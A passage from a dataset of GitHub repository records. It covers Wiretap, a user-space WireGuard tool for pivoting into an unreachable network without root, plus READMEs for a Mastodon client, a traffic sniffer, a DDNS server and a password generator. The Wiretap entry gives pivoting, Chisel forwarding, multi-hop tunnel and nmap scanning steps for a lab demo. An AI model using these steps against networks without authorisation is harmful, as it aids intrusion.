\u251c\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\u2502 fd:1::3 \u2502\n\u2502 \u2502\n\u2502 server \u2502\n\u2502 \u2502\n\u2502 10.2.0.3 \u2502\n\u2502 fd:2::3 \u251c\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2502 target network \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2502 10.2.0.0/16,fd:2::/64 \u2502\n\u2502 10.2.0.4 \u251c\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\u2502 fd:2::4 \u2502\n\u2502 \u2502\n\u2502 target \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n```\n\n### Video\n\n
\n\n\nhttps://user-images.githubusercontent.com/26662746/202822223-af752660-f263-43dc-bdf1-63140bab316b.mp4\n
\n\n### Step-By-Step\n\nYou have unprivileged access to the server host and want to reach the target host from the client host using Wiretap. \n\n#### Setup\n\nClone this repo.\n\nStart the demo containers with:\n```bash\ndocker compose up --build\n```\n\nOpen new tabs for interactive sessions with the client and server machines:\n```bash\ndocker exec -it wiretap-client-1 bash\n```\n```bash\ndocker exec -it wiretap-server-1 bash\n```\n\n#### Observe Network Limitations\n\nThe target network, and therefore the target host, is unreachable from the client machine. Both the server and target hosts are running a web service on port 80, so try interacting with each of the services from each of the hosts:\n\nAccessing the server's web service from the client should work:\n```bash\nclient$ curl http://10.1.0.3\n```\n\nAccessing the target web service from the client should not work, but doing the same thing from the server machine will:\n\n```bash\n# fails\nclient$ curl http://10.2.0.4\n```\n```bash\nserver$ curl http://10.2.0.4\n```\n\n#### Configure\n\nConfigure Wiretap from the client machine. Remember, `--endpoint` is how the server machine should reach the client and `--routes` determines which traffic is routed through Wiretap. \n\n* `--endpoint` needs to be the client address and the default WireGuard port: `10.1.0.2:51820`\n* `--routes` needs to be the subnet of the target network: `10.2.0.0/16`. But there is also an IPv6 subnet, so we should also put `fd:2::/64`. If you just wanted to route traffic to the target host, you could put `10.2.0.4/32` here instead\n\n```bash\n./wiretap_linux_amd64 configure --endpoint 10.1.0.2:51820 --routes 10.2.0.0/16,fd:2::/64\n```\n\nInstall the newly created WireGuard config with:\n\n```bash\nwg-quick up ./wiretap.conf\n```\n\nCopy and paste the Wiretap arguments printed by the configure command into the server machine prompt. It should look like this:\n\n```bash\n./wiretap_linux_amd64 serve --private --public --endpoint 10.1.0.2:51820\n```\n\n#### Test\n\nThe WireGuard handshake should be complete. Confirm with:\n\n```bash\nwg show\n```\n\nIf the handshake was successful the client should be able to reach the target network transparently. Confirm by running the same test that failed before:\n\n```bash\nclient$ curl http://10.2.0.4\n```\n\nThat's it! Try scanning, pinging, and anything else you can think of (please submit an issue if you think something should work but doesn't!). Here are a few ideas:\n- HTTP\n - `curl http://10.2.0.4`\n - `curl http://[fd:2::4]`\n- Nmap\n - `nmap 10.2.0.4 -v`\n - `nmap -6 fd:2::4 -v`\n- ICMP\n - `ping 10.2.0.4`\n - `ping fd:2::4`\n- UDP\n - `nmap -sU 10.2.0.4 -v`\n - `nmap -sU -6 fd:2::4 -v`\n\n#### Teardown\n\nTo bring down the WireGuard interface on the client machine, run:\n\n```bash\nwg-quick down ./wiretap.conf\n```\n\n## How It Works\n\nA traditional VPN can't be installed by unprivileged users because VPNs rely on dangerous operations like changing network routes and working with raw packets. \n\nWiretap bypasses this requirement by rerouting traffic to a user-space TCP/IP network stack, where a listener accepts connections on behalf of the true destination. Then it creates a new connection to the true destination and copies data between the endpoint and the peer. This is similar to how https://github.com/sshuttle/sshuttle works, but relies on WireGuard as the tunneling mechanism rather than SSH. 
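\n\nBelow is a minimal, illustrative Go sketch of that accept-dial-copy pattern (this is not Wiretap's actual code; the listen and destination addresses are placeholders chosen only for demonstration):\n\n```go\npackage main\n\nimport (\n\t\"io\"\n\t\"log\"\n\t\"net\"\n)\n\nfunc main() {\n\t// Listen where the rerouted traffic arrives (illustrative address).\n\tln, err := net.Listen(\"tcp\", \"127.0.0.1:8080\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tfor {\n\t\tclient, err := ln.Accept()\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\t\tgo func(c net.Conn) {\n\t\t\tdefer c.Close()\n\t\t\t// Open a new connection to the true destination (placeholder address).\n\t\t\tupstream, err := net.Dial(\"tcp\", \"10.0.0.5:80\")\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tdefer upstream.Close()\n\t\t\t// Copy data between the two peers until either side closes.\n\t\t\tgo io.Copy(upstream, c)\n\t\t\tio.Copy(c, upstream)\n\t\t}(client)\n\t}\n}\n```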
\n\n\n## Experimental\n\n### TCP Tunneling\n\n> **Note**\n> Performance will suffer, only use TCP Tunneling as a last resort\n\nIf you have *no* outbound UDP access, you can still use Wiretap, but you'll need to tunnel WireGuard traffic through TCP. This should only be used as a last resort. From WireGuard's [Known Limitations](https://www.wireguard.com/known-limitations/) page:\n> **TCP Mode**\n>\n> WireGuard explicitly does not support tunneling over TCP, due to the classically terrible network performance of tunneling TCP-over-TCP. Rather, transforming WireGuard's UDP packets into TCP is the job of an upper layer of obfuscation (see previous point), and can be accomplished by projects like [udptunnel](https://github.com/rfc1036/udptunnel) and [udp2raw](https://github.com/wangyu-/udp2raw-tunnel).\n\nAnother great tool that has similar cross-platform capabilities to Wiretap is [Chisel](https://github.com/jpillora/chisel). We can use chisel to forward a UDP port to the remote system over TCP. To use:\n\nRun chisel server on the client system, specifying a TCP port you can reach from the server system:\n```bash\n./chisel server --port 8080\n```\n\nOn the server system, forward the port with this command using the same TCP port you specified in the previous command and using the ListenPort you specified when configuring Wiretap (the default is 51820). The format is `:0.0.0.0:/udp`.\n\nIn this example, we're forwarding 51821/udp on the server to 51820 on the client:\n```bash\n./chisel client :8080 51821:0.0.0.0:51820/udp\n```\n\nFinally, run Wiretap with the forwarded local port as your endpoint on the server system:\n```bash\n./wiretap serve --private --public --endpoint localhost:51821\n```\n\n### Nested Tunnels\n\nIt is possible to nest multiple WireGuard tunnels using Wiretap, allowing for multiple hops without requiring root on any of the intermediate nodes.\n\nUsing this network as an example, we can deploy Wiretap to both hop 1 and hop 2 machines in order to access the target machine on network 3.\n```\n \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502 \u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\n\u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502\n\u2502 \u2502 client \u251c\u2500\u2500\u253c\u2500\u25ba\u2502 hop 1 \u251c\u2500\u253c\u2500\u2500\u253c\u2500\u25ba\u2502 hop 2 \u251c\u2500\u253c\u2500\u2500\u25ba\u2502 target \u2502 \u2502\n\u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502\n\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 
\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n network 1: \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 network 3:\n 10.0.1.0/24 network 2: 10.0.3.0/24\n 10.0.2.0/24\n```\n\nAfter deploying Wiretap to hop 1 normally, re-run the configure command but forgo the endpoint argument because Wiretap currently has no way of tunneling traffic *back* to the client machine if initiated from the server side of the network. In the future Wiretap may support routing between multiple instances of Wiretap.\n\n> **Note**\n> Make sure the routes and port are different from the initial configuration\n\n```bash\n./wiretap configure --port 51821 --routes 10.0.3.0/24\n```\n\nThen deploy Wiretap to hop 2 with the resulting arguments. Because no endpoint was provided, the Endpoint parameter needs to be provided manually to the config file. This depends on the client being able to access hop 2 *through the first hop's instance of Wiretap*! Add the endpoint to the peer section of the new Wiretap config:\n\n```\nEndpoint = 10.0.2.2:51820\n```\n\nFinally, import the config into WireGuard on the client system. The client system will handshake with Wiretap on hop 2 via the tunnel to hop 1, and then all future connections to 10.0.3.0/24 will be routed to network 3 through both hops. \n", "readme_type": "markdown", "hn_comments": "I\u2019m not sure to understand what makes it different from WireGuard. Could someone eli5 ?Wireproxy can do similar stuff: https://github.com/octeep/wireproxy(Disclaimer: I am a contributor to Wireproxy)Hilarious name for an open source project released by a government lab.The focus here is on the fact that it runs in userspace. Tailscale in userspace does something similar where it receives packet \"meta-data\" and then just creates the packet that came through the tunnel and sends it out the lan interface. Is this what happens here? 
I do like the docker option ;)mitmproxy just gained this feature in 9.0.0 too: https://mitmproxy.org/posts/wireguard-mode/Cool project, but AV are gonna flag the shit out of it.ssf and other tunneling techno are already abused by a lot of threat actors ...Wire this to Lightning and profit.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mattn/go-mastodon", "link": "https://github.com/mattn/go-mastodon", "tags": ["mastodon", "golang", "go"], "stars": 538, "description": "mastodon client for golang", "lang": "Go", "repo_lang": "", "readme": "# go-mastodon\n\n[![Build Status](https://github.com/mattn/go-mastodon/workflows/test/badge.svg?branch=master)](https://github.com/mattn/go-mastodon/actions?query=workflow%3Atest)\n[![Codecov](https://codecov.io/gh/mattn/go-mastodon/branch/master/graph/badge.svg)](https://codecov.io/gh/mattn/go-mastodon)\n[![Go Reference](https://pkg.go.dev/badge/github.com/mattn/go-mastodon.svg)](https://pkg.go.dev/github.com/mattn/go-mastodon)\n[![Go Report Card](https://goreportcard.com/badge/github.com/mattn/go-mastodon)](https://goreportcard.com/report/github.com/mattn/go-mastodon)\n\n\n## Usage\n\n### Application\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/mattn/go-mastodon\"\n)\n\nfunc main() {\n\tapp, err := mastodon.RegisterApp(context.Background(), &mastodon.AppConfig{\n\t\tServer: \"https://mstdn.jp\",\n\t\tClientName: \"client-name\",\n\t\tScopes: \"read write follow\",\n\t\tWebsite: \"https://github.com/mattn/go-mastodon\",\n\t})\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tfmt.Printf(\"client-id : %s\\n\", app.ClientID)\n\tfmt.Printf(\"client-secret: %s\\n\", app.ClientSecret)\n}\n```\n\n### Client\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/mattn/go-mastodon\"\n)\n\nfunc main() {\n\tc := mastodon.NewClient(&mastodon.Config{\n\t\tServer: \"https://mstdn.jp\",\n\t\tClientID: \"client-id\",\n\t\tClientSecret: \"client-secret\",\n\t})\n\terr := c.Authenticate(context.Background(), \"your-email\", \"your-password\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\ttimeline, err := c.GetTimelineHome(context.Background(), nil)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tfor i := len(timeline) - 1; i >= 0; i-- {\n\t\tfmt.Println(timeline[i])\n\t}\n}\n```\n\n## Status of implementations\n\n* [x] GET /api/v1/accounts/:id\n* [x] GET /api/v1/accounts/verify_credentials\n* [x] PATCH /api/v1/accounts/update_credentials\n* [x] GET /api/v1/accounts/:id/followers\n* [x] GET /api/v1/accounts/:id/following\n* [x] GET /api/v1/accounts/:id/statuses\n* [x] POST /api/v1/accounts/:id/follow\n* [x] POST /api/v1/accounts/:id/unfollow\n* [x] GET /api/v1/accounts/:id/block\n* [x] GET /api/v1/accounts/:id/unblock\n* [x] GET /api/v1/accounts/:id/mute\n* [x] GET /api/v1/accounts/:id/unmute\n* [x] GET /api/v1/accounts/:id/lists\n* [x] GET /api/v1/accounts/relationships\n* [x] GET /api/v1/accounts/search\n* [x] GET /api/v1/apps/verify_credentials\n* [x] GET /api/v1/bookmarks\n* [x] POST /api/v1/apps\n* [x] GET /api/v1/blocks\n* [x] GET /api/v1/conversations\n* [x] DELETE /api/v1/conversations/:id\n* [x] POST /api/v1/conversations/:id/read\n* [x] GET /api/v1/favourites\n* [x] GET /api/v1/filters\n* [x] POST /api/v1/filters\n* [x] GET /api/v1/filters/:id\n* [x] PUT /api/v1/filters/:id\n* [x] DELETE /api/v1/filters/:id\n* [x] GET /api/v1/follow_requests\n* [x] POST /api/v1/follow_requests/:id/authorize\n* [x] POST /api/v1/follow_requests/:id/reject\n* [x] POST 
/api/v1/follows\n* [x] GET /api/v1/instance\n* [x] GET /api/v1/instance/activity\n* [x] GET /api/v1/instance/peers\n* [x] GET /api/v1/lists\n* [x] GET /api/v1/lists/:id/accounts\n* [x] GET /api/v1/lists/:id\n* [x] POST /api/v1/lists\n* [x] PUT /api/v1/lists/:id\n* [x] DELETE /api/v1/lists/:id\n* [x] POST /api/v1/lists/:id/accounts\n* [x] DELETE /api/v1/lists/:id/accounts\n* [x] POST /api/v1/media\n* [x] GET /api/v1/mutes\n* [x] GET /api/v1/notifications\n* [x] GET /api/v1/notifications/:id\n* [x] POST /api/v1/notifications/:id/dismiss\n* [x] POST /api/v1/notifications/clear\n* [x] POST /api/v1/push/subscription\n* [x] GET /api/v1/push/subscription\n* [x] PUT /api/v1/push/subscription\n* [x] DELETE /api/v1/push/subscription\n* [x] GET /api/v1/reports\n* [x] POST /api/v1/reports\n* [x] GET /api/v2/search\n* [x] GET /api/v1/statuses/:id\n* [x] GET /api/v1/statuses/:id/context\n* [x] GET /api/v1/statuses/:id/card\n* [x] GET /api/v1/statuses/:id/history\n* [x] GET /api/v1/statuses/:id/reblogged_by\n* [x] GET /api/v1/statuses/:id/source\n* [x] GET /api/v1/statuses/:id/favourited_by\n* [x] POST /api/v1/statuses\n* [x] PUT /api/v1/statuses/:id\n* [x] DELETE /api/v1/statuses/:id\n* [x] POST /api/v1/statuses/:id/reblog\n* [x] POST /api/v1/statuses/:id/unreblog\n* [x] POST /api/v1/statuses/:id/favourite\n* [x] POST /api/v1/statuses/:id/unfavourite\n* [x] POST /api/v1/statuses/:id/bookmark\n* [x] POST /api/v1/statuses/:id/unbookmark\n* [x] GET /api/v1/timelines/home\n* [x] GET /api/v1/timelines/public\n* [x] GET /api/v1/timelines/tag/:hashtag\n* [x] GET /api/v1/timelines/list/:id\n* [x] GET /api/v1/streaming/user\n* [x] GET /api/v1/streaming/public\n* [x] GET /api/v1/streaming/hashtag?tag=:hashtag\n* [x] GET /api/v1/streaming/hashtag/local?tag=:hashtag\n* [x] GET /api/v1/streaming/list?list=:list_id\n* [x] GET /api/v1/streaming/direct\n\n## Installation\n\n```shell\ngo install github.com/mattn/go-mastodon@latest\n```\n\n## License\n\nMIT\n\n## Author\n\nYasuhiro Matsumoto (a.k.a. mattn)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chenjiandongx/sniffer", "link": "https://github.com/chenjiandongx/sniffer", "tags": ["sniffer", "packets", "gopacket", "traffic", "networking", "cli", "pcap", "tcpdump"], "stars": 538, "description": "\ud83e\udd12 A modern alternative network traffic sniffer.", "lang": "Go", "repo_lang": "", "readme": "# sniffer\n\n[![GoDoc](https://godoc.org/github.com/chenjiandongx/sniffer?status.svg)](https://godoc.org/github.com/chenjiandongx/sniffer)\n[![Go Report Card](https://goreportcard.com/badge/github.com/chenjiandongx/sniffer)](https://goreportcard.com/report/github.com/chenjiandongx/sniffer)\n[![License](https://img.shields.io/badge/License-MIT-brightgreen.svg)](https://opensource.org/licenses/MIT)\n\n> *A modern alternative network traffic sniffer inspired by [bandwhich](https://github.com/imsnif/bandwhich)(Rust) and [nethogs](https://github.com/raboof/nethogs)(C++).*\n\nhttps://user-images.githubusercontent.com/19553554/147360587-a3cfee18-7eb6-464b-9173-9afe6ee86cdf.mov\n\n## Introduction\n\n[\u4e2d\u6587\u4ecb\u7ecd](https://chenjiandongx.me/2021/11/17/sniffer-network-traffic/)\n\nsniffer is designed for network troubleshooting. It can be started at any time to analyze the processes or connections causing increases in network traffic without loading any kernel modules. 
Its TUI is responsive and automatically adapts to terminals of all sizes.\n\nsniffer uses [gopacket](https://github.com/google/gopacket) to sniff the interfaces and record packet info. gopacket wraps the Go port of the `libpcap` library and provides some additional features. One of the projects that inspired sniffer is `bandwhich`, which has a sophisticated interface and multiple ways to display data, but it does not support BPF filters. Another is `nethogs`, which supports BPF filters but can only show data per process, without a connections or remote-address view. sniffer combines the advantages of both projects and adds a new Plot mode.\n\n***Connections and Process Matching***\n\nOn Linux, sniffer follows the approach used by the [ss](https://man7.org/linux/man-pages/man8/ss.8.html) tool, obtaining connections in the `ESTABLISHED` state via a [netlink socket](https://man7.org/linux/man-pages/man7/netlink.7.html), since that is more efficient than reading the `/proc/net/*` files directly. Either way, per-process traffic is aggregated by matching the `inode` information under `/proc/${pid}/fd`.\n\nOn macOS, the [lsof](https://ss64.com/osx/lsof.html) command is invoked and its output is parsed to analyze process connection information. On Windows, sniffer uses the API provided by [gopsutil](https://github.com/shirou/gopsutil) directly.\n\n## Installation\n\n***sniffer*** relies on the `libpcap` library to capture user-level packets, so you need to have it installed first.\n\n### Linux / Windows\n\n**Debian/Ubuntu**\n```shell\n$ sudo apt-get install libpcap-dev\n```\n\n**CentOS/Fedora**\n```shell\n$ sudo yum install libpcap libpcap-devel\n```\n\n**Windows**\n\nWindows needs [npcap](https://nmap.org/npcap/) installed for capturing packets.\n\nAfter that, install sniffer with the `go get` command.\n\n```shell\n$ go get -u github.com/chenjiandongx/sniffer\n```\n\n### MacOS\n\n```shell\n$ brew install sniffer\n```\n\n## Usages\n\n```shell\n\u276f sniffer -h\n# A modern alternative network traffic sniffer.\n\nUsage:\n sniffer [flags]\n\nExamples:\n # bytes mode in MB unit\n $ sniffer -u MB\n\n # only capture the TCP protocol packets with lo,eth prefixed devices\n $ sniffer -b tcp -d lo -d eth\n\nFlags:\n -a, --all-devices listen all devices if present\n -b, --bpf string specify string pcap filter with the BPF syntax (default \"tcp or udp\")\n -d, --devices-prefix stringArray prefixed devices to monitor (default [en,lo,eth,em,bond])\n -h, --help help for sniffer\n -i, --interval int interval for refresh rate in seconds (default 1)\n -l, --list list all devices name\n -m, --mode int view mode of sniffer (0: bytes 1: packets 2: plot)\n -n, --no-dns-resolve disable the DNS resolution\n -u, --unit string unit of traffic stats, optional: B, Kb, KB, Mb, MB, Gb, GB (default \"KB\")\n -v, --version version for sniffer\n```\n\n**Hotkeys**\n\n| Keys | Description |\n| ---- | ----------- |\n| Space | pause refreshing |\n| Tab | rearrange tables |\n| s | switch next view mode |\n| q | quit |\n\n## Performance\n\n[iperf](https://github.com/esnet/iperf) is a tool for active measurements of the maximum achievable bandwidth on IP networks. 
Next we use this tool to forge massive packets on the `lo` device.\n\n```shell\n$ iperf -s -p 5001\n$ iperf -c localhost --parallel 40 -i 1 -t 2000\n```\n\n***sniffer vs bandwhich vs nethogs***\n\nAs you can see, CPU overhead is `bandwhich > sniffer > nethogs`, while memory overhead is `sniffer > nethogs > bandwhich`.\n```shell\n PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND\n 128405 root 20 0 210168 5184 3596 S 31.0 0.3 1:21.69 bandwhich\n 128596 root 20 0 1449872 21912 8512 S 20.7 1.1 0:28.54 sniffer\n 128415 root 20 0 18936 7464 6900 S 5.7 0.4 0:11.56 nethogs\n```\n\nLooking at the stats they report, sniffer and bandwhich are very close (~2.5 GB/s), while nethogs only handles about 1.122 GB/s.\n\n| | sniffer | bandwhich | nethogs |\n| -- | ------- | --------- | ------- |\n| **Upload** | 2.5GiBps | 2.5GiBps | 1.12GiBps |\n\n## View Mode\n\n***Bytes Mode:*** displays traffic stats in bytes using the Table widget.\n\n![](https://user-images.githubusercontent.com/19553554/147360714-98709e52-1f73-4882-ba56-30f572be9b7e.jpg)\n\n***Packets Mode:*** displays traffic stats in packets using the Table widget.\n\n![](https://user-images.githubusercontent.com/19553554/147360686-5600d65b-9685-486b-b7cf-42c341364009.jpg)\n\n## License\n\nMIT [\u00a9chenjiandongx](https://github.com/chenjiandongx)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dprandzioch/docker-ddns", "link": "https://github.com/dprandzioch/docker-ddns", "tags": ["selfhosted", "self-hosted", "docker", "dynamic-dns", "dns", "ddns"], "stars": 537, "description": "Easy-to-deploy dynamic DNS with Docker, Go and Bind9", "lang": "Go", "repo_lang": "", "readme": "# Dynamic DNS with Docker, Go and Bind9\n\n![DockerHub build status](https://dockerbuildbadges.quelltext.eu/status.svg?organization=davd&repository=docker-ddns)\n![Travis build status](https://travis-ci.com/dprandzioch/docker-ddns.svg?branch=master)\n\nThis package allows you to set up a dynamic DNS server that lets you connect to\ndevices at home from anywhere in the world. All you need is a cheap VPS, a domain and access to its nameserver.\n\n![Connect to your NAS from work](https://raw.githubusercontent.com/dprandzioch/docker-ddns/develop/connect-to-your-nas-from-work.png)\n\n## Installation\n\nYou can either take the image from DockerHub or build it on your own.\n\n### Using DockerHub\n\nJust customize this to your needs and run:\n\n```\ndocker run -it -d \\\n -p 8080:8080 \\\n -p 53:53 \\\n -p 53:53/udp \\\n -e SHARED_SECRET=changeme \\\n -e ZONE=example.org \\\n -e RECORD_TTL=3600 \\\n --name=dyndns \\\n davd/docker-ddns:latest\n```\n\nIf you want to persist DNS configuration across container recreation, add `-v /somefolder:/var/cache/bind`. If you are experiencing any \nissues updating DNS configuration using the API (`NOTAUTH` and `SERVFAIL`), make sure to add writing permissions for root (UID=0) to your \npersistent storage (e.g. `chmod -R a+w /somefolder`).\n\nYou can also use Compose / Swarm to set up this project. 
For more information and an example `docker-compose.yml` with persistent data \nstorage, please refer to this file: https://github.com/dprandzioch/docker-ddns/blob/master/docker-compose.yml\n\n### Build from source / GitHub\n\n```\ngit clone https://github.com/dprandzioch/docker-ddns\ngit checkout master # Make sure to build the latest stable release\ncd docker-ddns\n$EDITOR envfile\nmake deploy\n```\n\nMake sure to change all environment variables in `envfile` to match your needs. Some more information can be found here: \nhttps://www.davd.io/build-your-own-dynamic-dns-in-5-minutes/\n\n## Exposed ports\n\nAfterwards you have a running docker container that exposes three ports:\n\n* 53/TCP -> DNS\n* 53/UDP -> DNS\n* 8080/TCP -> Management REST API\n\n\n## Using the API\n\nThat package features a simple REST API written in Go, that provides a simple\ninterface, that almost any router that supports Custom DDNS providers can\nattach to (e.g. Fritz!Box). It is highly recommended to put a reverse proxy\nbefore the API.\n\nIt provides one single GET request, that is used as follows:\n\nhttp://myhost.mydomain.tld:8080/update?secret=changeme&domain=foo&addr=1.2.3.4\n\n### Fields\n\n* `secret`: The shared secret set in `envfile`\n* `domain`: The subdomain to your configured domain, in this example it would\n result in `foo.example.org`. Could also be multiple domains that should be\n redirected to the same domain separated by comma, so \"foo,bar\"\n* `addr`: IPv4 or IPv6 address of the name record\n\n\nFor the DynDNS compatible fields please see Dyn's documentation here: \n\n```\nhttps://help.dyn.com/remote-access-api/perform-update/\n```\n\n\n### DynDNS compatible API\n\nThis package contains a DynDNS compatible handler for convenience and for use cases\nwhere clients cannot be modified to use the JSON responses and/or URL scheme outlined\nabove.\n\nThis has been tested with a number of routers. Just point the router to your DDNS domain\nfor updates.\n\nThe handlers will listen on:\n* /nic/update\n* /v2/update\n* /v3/update\n\n\n**The username is not validated at all so you can use anything as a username**\n**Password is the shared secret provided as an ENV variable**\n\n#### Examples\n\nAn example on the ddclient (Linux DDNS client) based Ubiquiti router line:\n\nset service dns dynamic interface eth0 service dyndns host-name \nset service dns dynamic interface eth0 service dyndns login \nset service dns dynamic interface eth0 service dyndns password \nset service dns dynamic interface eth0 service dyndns protocol dyndns2\nset service dns dynamic interface eth0 service dyndns server \n\nOptional if you used this behind an HTTPS reverse proxy like I do:\n\nset service dns dynamic interface eth0 service dyndns options ssl=true\n\nThis also means that DDCLIENT works out of the box and Linux based devices should work.\n\nD-Link DIR-842:\n\nAnother router that has been tested is from the D-Link router line where you need to fill the \ndetails in on the Web Interface. The values are self-explanatory. Under the server (once you chosen Manual)\nyou need to enter you DDNS server's hostname or IP. The protocol used by the router will be the \ndyndns2 by default and cannot be changed.\n\n\n## Accessing the REST API log\n\nJust run\n\n```\ndocker logs -f dyndns\n```\n\n## DNS setup\n\nTo provide a little help... 
To your \"real\" domain, like `domain.tld`, you\nshould add a subdomain that is delegated to this DDNS server like this:\n\n```\ndyndns IN NS ns\nns IN A \nns IN AAAA \n```\n\nYour management API should then also be accessible through\n\n```\nhttp://ns.domain.tld:8080/update?...\n```\n\nIf you provide `foo` as a domain when using the REST API, the resulting domain\nwill then be `foo.dyndns.domain.tld`.\n\n## Common pitfalls\n\n* If you're on a systemd-based distribution, the process `systemd-resolved` might occupy the DNS port 53. Therefore starting the container might fail. To fix this disable the DNSStubListener by adding `DNSStubListener=no` to `/etc/systemd/resolved.conf` and restart the service using `sudo systemctl restart systemd-resolved.service` but be aware of the implications... Read more here: https://www.freedesktop.org/software/systemd/man/systemd-resolved.service.html and https://github.com/dprandzioch/docker-ddns/issues/5\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sethvargo/go-password", "link": "https://github.com/sethvargo/go-password", "tags": ["password", "password-generator", "golang"], "stars": 537, "description": "A Golang library for generating high-entropy random passwords similar to 1Password or LastPass.", "lang": "Go", "repo_lang": "", "readme": "## Golang Password Generator\n\n[![GoDoc](https://img.shields.io/badge/go-documentation-blue.svg?style=flat-square)](https://pkg.go.dev/github.com/sethvargo/go-password/password)\n[![GitHub Actions](https://img.shields.io/github/workflow/status/sethvargo/go-password/Test?style=flat-square)](https://github.com/sethvargo/go-password/actions?query=workflow%3ATest)\n\nThis library implements generation of random passwords with provided\nrequirements as described by [AgileBits\n1Password](https://discussions.agilebits.com/discussion/23842/how-random-are-the-generated-passwords)\nin pure Golang. The algorithm is commonly used when generating website\npasswords.\n\nThe library uses crypto/rand for added randomness.\n\nSample example passwords this library may generate:\n\n```text\n0N[k9PhDqmmfaO`p_XHjVv`HTq|zsH4XiH8umjg9JAGJ#\\Qm6lZ,28XF4{X?3sHj\n7@90|0H7!4p\\,c Since these are completely randomized, it's possible that they may generate passwords that don't comply with some custom password policies, such as ones that require both upper case AND lower case letters. 
